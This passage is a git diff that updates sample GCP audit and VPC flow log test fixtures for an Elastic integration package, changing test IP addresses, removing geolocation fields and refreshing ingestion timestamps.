+{"insertId":"14iipwlfd8t01l","jsonPayload":{"bytes_sent":"14132","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"91","reporter":"DEST","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01b","jsonPayload":{"bytes_sent":"151213","connection":{"dest_ip":"67.43.156.13","dest_port":33574,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"68","reporter":"SRC","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} diff --git a/packages/gcp/changelog.yml b/packages/gcp/changelog.yml index 06be6cc3698..5ecd24b356b 100644 --- a/packages/gcp/changelog.yml +++ b/packages/gcp/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log index 8336643ee34..a26f7c7c069 100644 --- a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log +++ b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log @@ -3,8 +3,8 @@ {"insertId":"yonau2dg2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"response":{"@type":"core.k8s.io/v1.Status","apiVersion":"v1","details":{"group":"batch","kind":"jobs","name":"gsuite-exporter-1589294700","uid":"2beff34a-945f-11ea-bacf-42010a80007f"},"kind":"Status","metadata":{},"status":"Success"},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"} {"insertId":"yonau3dc2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com","status":{"code":7,"message":"PERMISSION_DENIED"}},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"} {"insertId":"87efd529-6349-45d2-b905-fc607e6c5d3b","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"cert-manager-webhook:auth-delegator\" of ClusterRole \"system:auth-delegator\" to ServiceAccount \"cert-manager-webhook/cert-manager\""},"logName":"projects/foo/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"5555555-6349-45d2-b905-fc607e6c5d3b","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"system:serviceaccount:cert-manager:cert-manager-webhook"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","resource":"authorization.k8s.io/v1beta1/subjectaccessreviews"}],"methodName":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","request":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":false}},"requestMetadata":{"callerIp":"10.11.12.13","callerSuppliedUserAgent":"webhook/v0.0.0 (linux/amd64) kubernetes/$Format"},"resourceName":"authorization.k8s.io/v1beta1/subjectaccessreviews","response":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":true,"reason":"RBAC: allowed by ClusterRoleBinding \"system:discovery\" of ClusterRole \"system:discovery\" to Group \"system:authenticated\""}},"serviceName":"k8s.io","status":{"code":0}},"receiveTimestamp":"2020-08-05T21:07:32.157698684Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2020-08-05T21:07:30.974750Z"} -{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"1.2.3.4","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"} -{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"2.3.4.5","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"} +{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"67.43.156.13","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"} +{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"67.43.156.13","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"} {"insertId":"94170ac4-6e82-4345-98ad-3c780222d19d","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"94170ac4-6e82-4345-98ad-3c780222d19d","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.core.v1.nodes.list","resource":"core/v1/nodes"}],"methodName":"io.k8s.core.v1.nodes.list","requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"GoogleCloudConsole"},"resourceName":"core/v1/nodes","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-23T14:47:31.94822935Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-23T14:47:07.535383Z"} {"insertId":"b10a904a-faa4-4e0d-9ec3-7bc6a180196a","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"","k8s.io/deprecated":"true","k8s.io/removed-release":"1.22"},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"b10a904a-faa4-4e0d-9ec3-7bc6a180196a","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.extensions.v1beta1.ingresses.list","resource":"extensions/v1beta1/namespaces/cos-auditd/ingresses"}],"methodName":"io.k8s.extensions.v1beta1.ingresses.list","requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"GoogleCloudConsole"},"resourceName":"extensions/v1beta1/namespaces/cos-auditd/ingresses","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-23T14:16:36.37362467Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-23T14:16:07.574776Z"} {"insertId":"e973134d-b4d5-4e2f-92b8-82bba13fdb92","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"system:public-info-viewer\" of ClusterRole \"system:public-info-viewer\" to Group \"system:unauthenticated\""},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"e973134d-b4d5-4e2f-92b8-82bba13fdb92","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"system:anonymous"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.get","resource":"readyz"}],"methodName":"io.k8s.get","requestMetadata":{"callerIp":"127.0.0.1","callerSuppliedUserAgent":"kube-probe/1.19+"},"resourceName":"readyz","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-29T08:19:21.606980385Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-29T08:19:20.80581Z"} diff --git a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index 5b5ffd3bc31..d9cdef9c1ad 100644 --- a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json @@ -50,7 +50,7 @@ }, "event": { "action": "GetResourceBillingInfo", - "ingested": "2021-06-09T10:48:28.604014900Z", + "ingested": "2021-12-09T13:37:42.255753100Z", "original": "{\"insertId\":\"-uihnmjctwo\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"resourcemanager.projects.get\",\"resource\":\"projects/elastic-beats\",\"resourceAttributes\":{}}],\"methodName\":\"GetResourceBillingInfo\",\"request\":{\"@type\":\"type.googleapis.com/google.internal.cloudbilling.billingaccount.v1.GetResourceBillingInfoRequest\",\"resourceName\":\"projects/189716325846\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"destinationAttributes\":{},\"requestAttributes\":{}},\"resourceName\":\"projects/elastic-beats\",\"serviceName\":\"cloudbilling.googleapis.com\",\"status\":{}},\"receiveTimestamp\":\"2019-12-19T00:49:36.313482371Z\",\"resource\":{\"labels\":{\"project_id\":\"elastic-beats\"},\"type\":\"project\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:49:36.086Z\"}", "id": "-uihnmjctwo", "kind": "event", @@ -119,7 +119,7 @@ }, "event": { "action": "beta.compute.machineTypes.aggregatedList", - "ingested": "2021-06-09T10:48:28.604039400Z", + "ingested": "2021-12-09T13:37:42.255762300Z", "original": "{\"insertId\":\"-h6onuze1h7dg\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":false,\"permission\":\"compute.machineTypes.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.machineTypes.aggregatedList\",\"numResponseItems\":\"71\",\"request\":{\"@type\":\"type.googleapis.com/compute.machineTypes.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:45:51.711Z\"}},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/machineTypes\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2019-12-19T00:45:52.367887078Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.machineTypes.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:45:51.228Z\"}", "id": "-h6onuze1h7dg", "kind": "event", @@ -213,7 +213,7 @@ }, "event": { "action": "beta.compute.instances.aggregatedList", - "ingested": "2021-06-09T10:48:28.604046300Z", + "ingested": "2021-12-09T13:37:42.255766900Z", "original": "{\"insertId\":\"yonau2dg2zi\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"compute.instances.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.instances.aggregatedList\",\"numResponseItems\":\"61\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:44:25.198Z\"}},\"response\":{\"@type\":\"core.k8s.io/v1.Status\",\"apiVersion\":\"v1\",\"details\":{\"group\":\"batch\",\"kind\":\"jobs\",\"name\":\"gsuite-exporter-1589294700\",\"uid\":\"2beff34a-945f-11ea-bacf-42010a80007f\"},\"kind\":\"Status\",\"metadata\":{},\"status\":\"Success\"},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/instances\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2019-12-19T00:44:25.262379373Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.instances.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:44:25.051Z\"}", "id": "yonau2dg2zi", "kind": "event", @@ -298,7 +298,7 @@ }, "event": { "action": "beta.compute.instances.aggregatedList", - "ingested": "2021-06-09T10:48:28.604077200Z", + "ingested": "2021-12-09T13:37:42.255770400Z", "original": "{\"insertId\":\"yonau3dc2zi\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"permission\":\"compute.instances.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.instances.aggregatedList\",\"numResponseItems\":\"61\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:44:25.198Z\"}},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/instances\",\"serviceName\":\"compute.googleapis.com\",\"status\":{\"code\":7,\"message\":\"PERMISSION_DENIED\"}},\"receiveTimestamp\":\"2019-12-19T00:44:25.262379373Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.instances.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:44:25.051Z\"}", "id": "yonau3dc2zi", "kind": "event", @@ -386,7 +386,7 @@ }, "event": { "action": "io.k8s.authorization.v1beta1.subjectaccessreviews.create", - "ingested": "2021-06-09T10:48:28.604083800Z", + "ingested": "2021-12-09T13:37:42.255774900Z", "original": "{\"insertId\":\"87efd529-6349-45d2-b905-fc607e6c5d3b\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"cert-manager-webhook:auth-delegator\\\" of ClusterRole \\\"system:auth-delegator\\\" to ServiceAccount \\\"cert-manager-webhook/cert-manager\\\"\"},\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"5555555-6349-45d2-b905-fc607e6c5d3b\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:serviceaccount:cert-manager:cert-manager-webhook\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.authorization.v1beta1.subjectaccessreviews.create\",\"resource\":\"authorization.k8s.io/v1beta1/subjectaccessreviews\"}],\"methodName\":\"io.k8s.authorization.v1beta1.subjectaccessreviews.create\",\"request\":{\"@type\":\"authorization.k8s.io/v1beta1.SubjectAccessReview\",\"apiVersion\":\"authorization.k8s.io/v1beta1\",\"kind\":\"SubjectAccessReview\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"group\":[\"system:serviceaccounts\",\"system:serviceaccounts:kube-system\",\"system:authenticated\"],\"nonResourceAttributes\":{\"path\":\"/apis/webhook.cert-manager.io/v1beta1\",\"verb\":\"get\"},\"user\":\"system:serviceaccount:kube-system:resourcequota-controller\"},\"status\":{\"allowed\":false}},\"requestMetadata\":{\"callerIp\":\"10.11.12.13\",\"callerSuppliedUserAgent\":\"webhook/v0.0.0 (linux/amd64) kubernetes/$Format\"},\"resourceName\":\"authorization.k8s.io/v1beta1/subjectaccessreviews\",\"response\":{\"@type\":\"authorization.k8s.io/v1beta1.SubjectAccessReview\",\"apiVersion\":\"authorization.k8s.io/v1beta1\",\"kind\":\"SubjectAccessReview\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"group\":[\"system:serviceaccounts\",\"system:serviceaccounts:kube-system\",\"system:authenticated\"],\"nonResourceAttributes\":{\"path\":\"/apis/webhook.cert-manager.io/v1beta1\",\"verb\":\"get\"},\"user\":\"system:serviceaccount:kube-system:resourcequota-controller\"},\"status\":{\"allowed\":true,\"reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:discovery\\\" of ClusterRole \\\"system:discovery\\\" to Group \\\"system:authenticated\\\"\"}},\"serviceName\":\"k8s.io\",\"status\":{\"code\":0}},\"receiveTimestamp\":\"2020-08-05T21:07:32.157698684Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2020-08-05T21:07:30.974750Z\"}", "id": "87efd529-6349-45d2-b905-fc607e6c5d3b", "kind": "event", @@ -411,19 +411,7 @@ "logger": "projects/foo/logs/cloudaudit.googleapis.com%2Factivity" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", - "location": { - "lon": 37.6172, - "lat": 55.7527 - } - }, - "ip": "1.2.3.4" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -448,7 +436,7 @@ }, "method_name": "v1.compute.images.insert", "request_metadata": { - "caller_ip": "1.2.3.4", + "caller_ip": "67.43.156.13", "caller_supplied_user_agent": "google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)" }, "response": { @@ -483,8 +471,8 @@ }, "event": { "action": "v1.compute.images.insert", - "ingested": "2021-06-09T10:48:28.604089300Z", - "original": 